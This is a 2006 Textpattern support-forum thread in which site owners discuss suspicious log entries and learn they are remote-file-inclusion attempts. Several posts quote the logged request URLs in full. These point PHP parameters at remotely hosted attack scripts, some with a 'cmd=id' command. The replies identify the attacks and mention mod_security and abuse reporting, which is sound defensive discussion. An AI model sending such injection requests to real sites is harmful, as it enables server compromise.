Hack attempt?

NeilA · 2006-09-11 00:22:37

I’m seeing a funny entry in the log for one TXP site I have:

/index.php?file=http://clonebox.altervista.org/ex.txt?

It’s appeared twice in the last few hours, from different IP’s. If I load up the URL, it displays a big PHP file. Is this some kind of hack attempt? It doesn’t look very legit to me.

Can anyone shed any light?

Cheers

Neko · 2006-09-11 00:38:15

Altervista is a free hosting provider, you could at least ask them to remove that file, it really looks like something created to crack web-sites. The address used to file complaints is abuse@altervista.it.

NeilA · 2006-09-11 00:39:48

Thanks Neko…

Didn’t think it looked right… :)

jm · 2006-09-11 00:58:09

Yeah, one of my sites has been having the same problem. They’re from different IPs and different websites, but 3 of the files are the same (targeting aedating systems, chatbots, and other nonexistant junk). Then again, people search for free mp3s, mpeg encoders, and other completely irrelevant terms with the site search.

Fortunately, Textpattern is resistent to these stupid includes. Thanks Team TXP!

The latest ones are:

/developers/header.php?path=http://71.132.210.125/omg/remote.txt?
/forum/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.2therescue.com/tool25.dat?&list=1&cmd=id
/forum/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.19abi99.com/tool25.dat?&list=1&cmd=id
/developers/php?function=http://0100.iespana.es/cmd.jpg??

I think some script kiddie posted these to a forum, as they sporadically. No big deal though.

Mary · 2006-09-11 02:27:20

Sounds like referrer spamming combined a hack attempt (i.e.: spam the log, and wait for unsuspecting victim to load the url). Never trust urls provided by unknown third parties (emails or referrer logs, etc).

zem · 2006-09-11 04:15:24

Some of these are exploits targetting something called FlashChat.

The gist of this FAQ entry is accurate: it’s common enough to notice lame wannabe hackers attempting to use exploits for unrelated software against your web site.

NeilA · 2006-09-11 06:19:08

Thanks for all the info people.
It’s been a good educational experience… :-)

NeilA · 2006-09-11 11:07:14

Just for the record…

I had turned off mod_security on that domain because of problems saving some cURL code in a TXP form.

Turning it back on gets rid of all the offending hits on the site… Also explains why it was only this domain getting the hits…

Textpattern CMS

Textpattern CMS support forum

#1 2006-09-11 00:22:37

Hack attempt?

#2 2006-09-11 00:38:15

Re: Hack attempt?

#3 2006-09-11 00:39:48

Re: Hack attempt?

#4 2006-09-11 00:58:09

Re: Hack attempt?

#5 2006-09-11 02:27:20

Re: Hack attempt?

#6 2006-09-11 04:15:24

Re: Hack attempt?

#7 2006-09-11 06:19:08

Re: Hack attempt?

#8 2006-09-11 11:07:14

Re: Hack attempt?

Board footer